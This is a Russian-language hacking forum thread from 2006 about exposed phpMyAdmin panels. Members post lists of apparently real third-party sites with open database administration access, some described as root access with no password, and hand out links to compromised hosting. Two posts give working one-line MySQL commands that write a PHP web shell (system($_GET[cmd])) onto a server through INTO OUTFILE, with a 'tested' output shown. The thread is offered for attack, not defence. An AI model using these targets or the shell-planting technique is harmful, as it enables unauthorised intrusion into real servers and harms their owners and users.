Прикол с phpMyAdmin

Discussion in 'PHP' started by NOmeR1, 6 Nov 2006.

  1. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Вот ссылочки
    http://test.hosting.unifree.ru/phpMyAdmin-2.8.0.1/index.php
    http://www.gigaru.ru/xxxx2/ddt/phpMyAdmin-2.9.1-rc1/
    http://release.com.ua/relizad/read_dump.php
    http://astera.elcom.ru/astera/
    :cool: :cool:
    Может будет ещё.
     
  2. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Там изначально ничего не было, или умельцы уже сделали DROP TABLE? :p
     
  3. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    База пустая!
     
  4. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    :D
    _http://learning.cfm.salford.ac.uk/phpMyAdmin-2.8.1/index.php (root привилегии)

    _http://gnosis.naucalpan.gob.mx/phpmyadmin/index.php (тоже root привилегии, на руте даже пасс не стоит :) )

    _http://learning.cfm.salford.ac.uk/phpMyAdmin-2.8.1/index.php (опять root права)

    _http://nd.gamebrink.com/phpMyAdmin-2.8.0.3/index.php
     
    #4 degeneration x, 6 Nov 2006
    Last edited: 6 Nov 2006
  5. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    http://www.maloe.ru/php/index.php
    http://rosfirm.wbsv.ru/pm0/index.php
    http://www.wolua.org/MyAdmin/index.php
    http://lib.icc.melitopol.net/mysqladm/index.php
    http://www.hydrojet-m.ru/test/phpmyadmin-2.4.0/index.php
    http://ukrmed.info/umi/phpMyAdmin/index.php
    http://zww.izmuroma.ru/phpmyadmin/index.php
    http://www.school28.os.kz/phpmyadmin21/index.php
    http://www.vlaz-ik6.kovrov.ru/phpMyAdmin/index.php
    http://swizard.beercan.ru/phpMyAdmin/
    http://www.dsp.kz/phpMyAdmin/
    http://www.1991lobo.ru/mysql_admin/index.php
    http://radio.udaff.com/sqladmin/index.php
    Пока больше не нашёл.
     
    #5 NOmeR1, 6 Nov 2006
    Last edited: 6 Nov 2006
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    а в чем прикол то???
     
  7. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    В гугле введи
    тож много интересного =))
     
    2 people like this.
  8. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Рулеззззз!
    https://www.elfon.com/mysql-admin/main.php?lang=en-iso-8859-1&convcharset=iso-8859-1&server=0
    http://pes.inf.puc-rio.br/pes05_1_1/site/phpMyAdmin/main.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci
    http://www.csse.uwa.edu.au/~mkranz/phpmyadmin-live/main.php?lang=en-iso-8859-1&server=1
    Имея доступ к phpMyAdmin мона типа шелл залить или там php injection провернуть?
     
  9. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Мона!!
    Шелл будет в /path/to/file/shell.php (c)
     
    #9 Zitt, 7 Nov 2006
    Last edited: 7 Nov 2006
  10. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Эт когда шелл лью база ругаеться! Что предложите делать? =)
     
  11. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    PHP:
    SET column='<? system($cmd); ?>'
     
  12. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Зачем так сложно?
    SELECT 'код_шелла' INTO OUTFILE '/путь_к_файлу/shell.php'

    Только что протестил на локалхосте:
    mysql> select '<? system($_GET[cmd]); ?>' into outfile '/home/localhost/www/shell.php';
    Query OK, 1 row affected (0.01 sec)

    mysql>
     
    2 people like this.
  13. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    СКИНУ ОФИГИТЕЛЬНУЮ ССЫЛКУ НА ХОСТИНГ ПЕРВОМУ ОТПИСАВШЕМУСЯ!!!!!!!!!!
     
  14. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    мне мне мне:)
     
  15. XIII

    XIII Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    109
    Likes Received:
    17
    Reputations:
    -1
    А хостинг платный?
     
  16. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Ссылочка ушла, хост платный!
     
  17. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Ещё один супер хостинг уйдёт в руки первого отписавшегося. ЭТОТ ХОСТ ЛУЧШЕ!!!
     
  18. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    мне мне мне:)
     
  19. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Ну нет... Нельзя обижать людей, они тоже хотят!
    :rolleyes: Ну если не кому не надо, то я себе оставлю!
     
    #19 NOmeR1, 7 Nov 2006
    Last edited: 7 Nov 2006
  20. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    МНЕ!(если можно конечно...)